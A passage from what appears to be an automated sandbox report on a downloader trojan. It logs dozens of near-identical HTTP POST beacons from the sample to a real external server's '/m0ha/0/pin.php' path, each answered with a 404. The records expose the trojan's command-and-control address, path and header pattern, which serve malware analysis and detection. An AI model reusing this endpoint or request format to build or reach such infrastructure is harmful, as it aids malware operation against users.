                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              47192.168.2.54974387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:35.414645910 CET1206OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:37.513856888 CET1207INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:35 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              48192.168.2.54974487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:37.905678034 CET1207OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:38.861871004 CET1208INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:37 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              49192.168.2.54974587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:39.134248018 CET1209OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:39.420017958 CET1209INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:39 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.54970087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:03.117404938 CET1138OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:03.381764889 CET1138INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:03 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              50192.168.2.54974687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:39.905941963 CET1210OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:40.780755997 CET1211INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:39 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              51192.168.2.54974787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:41.068304062 CET1211OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:41.614192009 CET1212INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:41 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              52192.168.2.54974887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:41.839658022 CET1213OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:42.790277004 CET1213INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:41 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              53192.168.2.54974987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:43.049675941 CET1214OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:43.664397955 CET1215INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:43 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              54192.168.2.54975087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:43.914421082 CET1215OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:44.222182035 CET1216INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:43 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              55192.168.2.54975187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:44.461999893 CET1217OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:44.709526062 CET1217INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:44 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              56192.168.2.54975287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:44.936400890 CET1218OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:45.928817987 CET1219INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:44 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              57192.168.2.54975387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:46.167454958 CET1219OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:46.622526884 CET1220INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:46 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              58192.168.2.54975487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:46.877665997 CET1221OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:47.542124987 CET1221INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:46 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              59192.168.2.54975587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:47.791488886 CET1222OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:48.513504982 CET1223INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:47 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.54970187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:04.226190090 CET1139OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:07.057657003 CET1140INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:04 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              60192.168.2.54975687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:48.767344952 CET1223OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:49.270061970 CET1224INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:48 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              61192.168.2.54975787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:49.520612955 CET1225OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:49.785249949 CET1225INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:49 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              62192.168.2.54975887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:50.051361084 CET1226OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:50.317364931 CET1227INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:50 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              63192.168.2.54975987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:50.560163021 CET1227OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:50.805489063 CET1228INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:50 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              64192.168.2.54976087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:51.055531025 CET1229OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:51.371975899 CET1229INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:51 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              65192.168.2.54976187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:51.624269962 CET1230OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:51.938138008 CET1231INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:51 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              66192.168.2.54976287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:52.186492920 CET1231OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:52.449352980 CET1232INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:52 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              67192.168.2.54976387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:52.696928978 CET1233OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:53.726037025 CET1233INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:52 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              68192.168.2.54976487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:53.959341049 CET1234OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:54.642890930 CET1235INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:53 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              69192.168.2.54976587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:54.879328012 CET1235OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:55.280209064 CET1236INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:54 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.54970287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:07.329027891 CET1140OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:08.041173935 CET1141INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:07 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              70192.168.2.54976687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:55.525891066 CET1237OUTPOST /m0ha/0/pin.php HTTP/1.0
